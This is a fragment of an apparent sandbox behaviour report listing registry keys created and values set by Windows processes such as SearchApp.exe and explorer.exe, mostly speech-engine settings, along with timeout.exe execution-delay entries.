| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\r1041sr.lxa" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\de-DE-N\\tn1031.bin" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\M1033Zira" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 2 0009 aa 000a ae 000b ah 000c ao 000d aw 000e ax 000f ay 0010 b 0011 ch 0012 d 0013 dh 0014 eh 0015 er 0016 ey 0017 f 0018 g 0019 h 001a ih 001b iy 001c jh 001d k 001e l 001f m 0020 n 0021 ng 0022 ow 0023 oy 0024 p 0025 r 0026 s 0027 sh 0028 t 0029 th 002a uh 002b uw 002c v 002d w 002e y 002f z 0030 zh 0031" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - fr-FR Embedded DNN v11.1" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Paul" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "You have selected %1 as the default voice." | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - English (United States)" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 + 0008 * 0009 1 000A 2 000B 3 000C 4 000D 5 000E a 000F ai 0010 an 0011 ang 0012 ao 0013 ba 0014 bai 0015 ban 0016 bang 0017 bao 0018 bei 0019 ben 001A beng 001B bi 001C bian 001D biao 001E bie 001F bin 0020 bing 0021 bo 0022 bu 0023 ca 0024 cai 0025 can 0026 cang 0027 cao 0028 ce 0029 cen 002A ceng 002B cha 002C chai 002D chan 002E chang 002F chao 0030 che 0031 chen 0032 cheng 0033 chi 0034 chong 0035 chou 0036 chu 0037 chuai 0038 chuan 0039 chuang 003A chui 003B chun 003C chuo 003D ci 003E cong 003F cou 0040 cu 0041 cuan 0042 cui 0043 cun 0044 cuo 0045 da 0046 dai 0047 dan 0048 dang 0049 dao 004A de 004B dei 004C den 004D deng 004E di 004F dia 0050 dian 0051 diao 0052 die 0053 ding 0054 diu 0055 dong 0056 dou 0057 du 0058 duan 0059 dui 005A dun 005B duo 005C e 005D ei 005E en 005F er 0060 fa 0061 fan 0062 fang 0063 fei 0064 fen 0065 feng 0066 fo 0067 fou 0068 fu 0069 ga 006A gai 006B gan 006C gang 006D gao 006E ge 006F gei 0070 gen 0071 geng 0072 gong 0073 gou 0074 gu 0075 gua 0076 guai 0077 guan 0078 guang 0079 gui 007A gun 007B guo 007C ha 007D hai 007E han 007F hang 0080 hao 0081 he 0082 hei 0083 hen 0084 heng 0085 hong 0086 hou 0087 hu 0088 hua 0089 huai 008A huan 008B huang 008C hui 008D hun 008E huo 008F ji 0090 jia 0091 jian 0092 jiang 0093 jiao 0094 jie 0095 jin 0096 jing 0097 jiong 0098 jiu 0099 ju 009A juan 009B jue 009C jun 009D ka 009E kai 009F kan 00A0 kang 00A1 kao 00A2 ke 00A3 kei 00A4 ken 00A5 keng 00A6 kong 00A7 kou 00A8 ku 00A9 kua 00AA kuai 00AB kuan 00AC kuang 00AD kui 00AE kun 00AF kuo 00B0 la 00B1 lai 00B2 lan 00B3 lang 00B4 lao 00B5 le 00B6 lei 00B7 leng 00B8 li 00B9 lia 00BA lian 00BB liang 00BC liao 00BD lie 00BE lin 00BF ling 00C0 liu 00C1 lo 00C2 long 00C3 lou 00C4 lu 00C5 luan 00C6 lue 00C7 lun 00C8 luo 00C9 lv 00CA ma 00CB mai 00CC man 00CD mang 00CE mao 00CF me 00D0 mei 00D1 men 00D2 meng 00D3 mi 00D4 mian 00D5 miao 00D6 mie 00D7 min 00D8 ming 00D9 miu 00DA mo 00DB mou 00DC mu 00DD na 00DE nai 00DF nan 00E0 nang 00E1 nao 00E2 ne 00E3 nei 00E4 nen 00E5 neng 00E6 ni 00E7 nian 00E8 niang 00E9 niao 00EA nie 00EB nin 00EC ning 00ED niu 00EE nong 00EF nou 00F0 nu 00F1 nuan 00F2 nue 00F3 nuo 00F4 nv 00F5 o 00F6 ou 00F7 pa 00F8 pai 00F9 pan 00FA pang 00FB pao 00FC pei 00FD pen 00FE peng 00FF pi 0100 pian 0101 piao 0102 pie 0103 pin 0104 ping 0105 po 0106 pou 0107 pu 0108 qi 0109 qia 010A qian 010B qiang 010C qiao 010D qie 010E qin 010F qing 0110 qiong 0111 qiu 0112 qu 0113 quan 0114 que 0115 qun 0116 ran 0117 rang 0118 rao 0119 re 011A ren 011B reng 011C ri 011D rong 011E rou 011F ru 0120 ruan 0121 rui 0122 run 0123 ruo 0124 sa 0125 sai 0126 san 0127 sang 0128 sao 0129 se 012A sen 012B seng 012C sha 012D shai 012E shan 012F shang 0130 shao 0131 she 0132 shei 0133 shen 0134 sheng 0135 shi 0136 shou 0137 shu 0138 shua 0139 shuai 013A shuan 013B shuang 013C shui 013D shun 013E shuo 013F si 0140 song 0141 sou 0142 su 0143 suan 0144 sui 0145 sun 0146 suo 0147 ta 0148 tai 0149 tan 014A tang 014B tao 014C te 014D tei 014E teng 014F ti 0150 tian 0151 tiao 0152 tie 0153 ting 0154 tong 0155 tou 0156 tu 0157 tuan 0158 tui 0159 tun 015A tuo 015B wa 015C wai 015D wan 015E wang 015F wei 0160 wen 0161 weng 0162 wo 0163 wu 0164 xi 0165 xia 0166 xian 0167 xiang 0168 xiao 0169 xie 016A xin 016B xing 016C xiong 016D xiu 016E xu 016F xuan 0170 xue 0171 xun 0172 ya 0173 yan 0174 yang 0175 yao 0176 ye 0177 yi 0178 yin 0179 ying 017A yo 017B yong 017C you 017D yu 017E yuan 017F yue 0180 yun 0181 za 0182 zai 0183 zan 0184 zang 0185 zao 0186 ze 0187 zei 0188 zen 0189 zeng 018A zha 018B zhai 018C zhan 018D zhang 018E zhao 018F zhe 0190 zhei 0191 zhen 0192 zheng 0193 zhi 0194 zhong 0195 zhou 0196 zhu 0197 zhua 0198 zhuai 0199 zhuan 019A zhuang 019B zhui 019C zhun 019D zhuo 019E zi 019F zong 01A0 zou 01A1 zu 01A2 zuan 01A3 zui 01A4 zun 01A5 zuo 01A6" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Male" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Hedda" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "11.0.2016.0129" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HW" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "MS-1041-110-WINMO-DNN" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR ja-JP Lookup Lexicon" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\ja-JP\\sidubm.table" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\sidubm.table" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\lsr1036.lxa" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\L1036" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "È stata selezionata la voce predefinita %1." | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Mark - English (United States)" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{57523D96-B7F6-4D2C-8AFC-BCC5F5392E94}" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\de-DE-N\\L1031" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "40C" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "16000" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Near" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\de-DE\\VoiceActivation_HW_de-DE.dat" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR fr-FR Lookup Lexicon" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR fr-FR Lts Lexicon" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Anywhere;Trailing" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - Spanish (Spain)" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\tn1036.bin" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Julie - French (France)" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Cosimo" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\lsr1041.lxa" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\ja-JP\\MSTTSLocjaJP.dat" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "MS-1040-110-WINMO-DNN" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "804" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
